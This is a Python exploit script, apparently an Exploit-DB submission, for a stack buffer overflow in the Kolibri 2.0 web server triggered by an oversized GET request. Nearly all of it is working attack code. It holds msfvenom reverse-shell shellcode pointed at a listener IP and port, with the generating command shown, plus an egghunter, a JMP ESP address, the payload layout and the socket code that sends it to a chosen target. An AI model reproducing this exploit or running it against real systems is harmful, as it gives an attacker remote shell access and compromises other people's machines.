#!/usr/bin/python3 # Exploit Title: Kolibri GET request buffer Overflow [Stack Egghunter] # Date: 2 Augst 2023 # Exploit Author: Mahmoud NourEldin @Engacker # Vendor App: https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip # Version: Kolibri 2.0 # Tested on: Windows 10 # Description: # For the first time making the egghunter jumping to the begging of the stack import socket, time, sys, os if len(sys.argv) != 3: print(f"[*] Usage: {sys.argv[0]} \n[*] Exploit created by Mahmoud NourEldin\n[*] https://www.linkedin.com/in/tamatahyt") sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) try: #[BadChars] \x00\x0a\x0d\x20\x3d\x3f #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x3d\x3f" buf = b"w00tw00t" buf += b"\xba\xc7\xe5\x34\xdd\xd9\xe8\xd9\x74\x24\xf4\x58" buf += b"\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x97" buf += b"\xeb\xd6\x28\xeb\x1c\x94\xd3\x13\xdd\xf9\x5a\xf6" buf += b"\xec\x39\x38\x73\x5e\x8a\x4a\xd1\x53\x61\x1e\xc1" buf += b"\xe0\x07\xb7\xe6\x41\xad\xe1\xc9\x52\x9e\xd2\x48" buf += b"\xd1\xdd\x06\xaa\xe8\x2d\x5b\xab\x2d\x53\x96\xf9" buf += b"\xe6\x1f\x05\xed\x83\x6a\x96\x86\xd8\x7b\x9e\x7b" buf += b"\xa8\x7a\x8f\x2a\xa2\x24\x0f\xcd\x67\x5d\x06\xd5" buf += b"\x64\x58\xd0\x6e\x5e\x16\xe3\xa6\xae\xd7\x48\x87" buf += b"\x1e\x2a\x90\xc0\x99\xd5\xe7\x38\xda\x68\xf0\xff" buf += b"\xa0\xb6\x75\x1b\x02\x3c\x2d\xc7\xb2\x91\xa8\x8c" buf += b"\xb9\x5e\xbe\xca\xdd\x61\x13\x61\xd9\xea\x92\xa5" buf += b"\x6b\xa8\xb0\x61\x37\x6a\xd8\x30\x9d\xdd\xe5\x22" buf += b"\x7e\x81\x43\x29\x93\xd6\xf9\x70\xfc\x1b\x30\x8a" buf += b"\xfc\x33\x43\xf9\xce\x9c\xff\x95\x62\x54\x26\x62" buf += b"\x84\x4f\x9e\xfc\x7b\x70\xdf\xd5\xbf\x24\x8f\x4d" buf += b"\x69\x45\x44\x8d\x96\x90\xcb\xdd\x38\x4b\xac\x8d" buf += b"\xf8\x3b\x44\xc7\xf6\x64\x74\xe8\xdc\x0c\x1f\x13" buf += b"\xb7\xf2\x48\x23\x22\x9b\x8a\x53\xa9\x62\x02\xb5" buf += b"\xdb\x84\x42\x6e\x74\x3c\xcf\xe4\xe5\xc1\xc5\x81" buf += b"\x26\x49\xea\x76\xe8\xba\x87\x64\x9d\x4a\xd2\xd6" buf += b"\x08\x54\xc8\x7e\xd6\xc7\x97\x7e\x91\xfb\x0f\x29" buf += b"\xf6\xca\x59\xbf\xea\x75\xf0\xdd\xf6\xe0\x3b\x65" buf += b"\x2d\xd1\xc2\x64\xa0\x6d\xe1\x76\x7c\x6d\xad\x22" buf += b"\xd0\x38\x7b\x9c\x96\x92\xcd\x76\x41\x48\x84\x1e" buf += b"\x14\xa2\x17\x58\x19\xef\xe1\x84\xa8\x46\xb4\xbb" buf += b"\x05\x0f\x30\xc4\x7b\xaf\xbf\x1f\x38\xcf\x5d\xb5" buf += b"\x35\x78\xf8\x5c\xf4\xe5\xfb\x8b\x3b\x10\x78\x39" buf += b"\xc4\xe7\x60\x48\xc1\xac\x26\xa1\xbb\xbd\xc2\xc5" buf += b"\x68\xbd\xc6" egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53" egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c" egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7" egghunter += b"\xff\xe7" eip = b"\x42\x24\x01\x10"#0x10012442 jmp esp ''' payload length is: 800byte EIP overwritten in 516 place which make a jmp to ESP ESP include the egghunter and number of CCCC Egghunter searching for w00tw00t+shellcode which exist in the first request [buf] Others just for place ''' payload = b"\x90"*(515-len(buf))+ buf + eip + egghunter + (268-len(egghunter)) *b"C" #The request of the server request = b"" request += b"GET /"+payload+b" HTTP/1.1\r\n" request += b"Host: 192.168.56.102:8080\r\n\r\n" #Connecting to the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print(f"[*]Sending The Evil Paylod...\nSee your reverse shell") s.connect((host, port)) s.send(request) s.close() print("[x]Done") #if can't connect except socket.error: print("Could not connect!\n[*]Is IP correct? Is Port correct?Can you ping the machine?")